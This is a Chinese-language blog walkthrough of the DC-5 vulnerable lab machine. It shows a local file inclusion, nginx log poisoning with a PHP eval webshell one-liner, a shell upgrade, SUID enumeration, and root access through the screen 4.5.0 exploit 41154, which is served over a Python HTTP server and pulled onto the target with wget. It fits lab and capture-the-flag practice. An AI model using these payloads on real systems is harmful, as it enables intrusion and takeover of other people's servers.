主机DC-5

主机DC-5

思路框架汇总

  • 扫IP端口
  • 扫描目录结构,验证时发现文件包含
  • 几个页面都包含了footer.php文件,尝试爆破目录,得出file参数
  • 利用日志文件包含写入一句话木马
  • 反弹shell,查找可以提权的文件
  • screen 4.5.0漏洞,在kali下载脚本
  • 搭载http文件服务,脚本传递到靶机端
  • 授予执行权限,执行脚本,即可提权

扫描IP,扫端口出现访问网页

网页上没有多余的信息,再次扫描一下网页目录

依次访问一下:

访问呢footer.php或thankyou.php时,重新刷新时发现时间变了

在contact页面提交之后,出现跳转页面到thankyou.php

发现文件包含漏洞

说明什么???

说明这几个目录都包含了footer.php文件,尝试爆破,目录

dirsearch -u http://192.168.218.130/thankyou.php

python3 dirsearch.py -u http://192.168.222.128/thankyou.php

发现存在file参数,访问一下,可能是文件包含

写入一句话木马,然后反弹shell

成功读取/etc/passwd,写入一句话木马

<?php @eval($_POST['a']);?>

nginx版本!日志文件位置: /var/log/nginx/error.log 木马写在url里!!!这里写在UA头中不能被识别!!!

进行反弹shell!

getshell:

python -c "import pty;pty.spawn('/bin/bash')"

python -c "import pty;pty.spawn('/bin/bash')"

如何提权

找能够提权的文件

find / -perm -u=s -type f 2>/dev/null

尝试1

exim4版本 版本 < 4.92.3(存在经典漏洞 CVE-2019-10149),执行以下命令先检测版本:

exim4 --version

试了发现不成功

尝试2

试一下screen 4.5.0有没有漏洞

searchsploit screen 4.5.0

存在路径,我们把他的脚本下载下来!!!

searchsploit -m 41154 -m 加名字!!!

下载成功

下面考虑如何把这个脚本上传到靶场呢???!!

Kali 本地快速搭建 HTTP 文件服务

开启服务,注意要在存在目标文件的目录下开启!!!

python3 -m http.server 8080

部分

作用

靶场说明

python3

调用 Python3 解释器

Kali 默认预装 Python3,直接执行即可

-m

以「模块模式」运行 Python

直接调用系统内置模块,无需写代码、无需额外安装依赖

http.server

Python3 内置的 HTTP 服务模块

核心功能:提供文件列表、文件下载,纯原生、零配置

8080

指定服务器监听端口

可自定义(如 80、8888、9090),靶场常用8080/80

(不易被拦截)

靶机端:wget

在靶机中获取目标文件!注意要在tmp目录中

wget 192.168.222.129:8080/41154.sh

授予执行权限

chmod +x 41154.sh

直接运行!

./41154.sh

提权成功!!

posted @ 2025-12-31 10:49  知足常福  阅读(0)  评论(0)    收藏  举报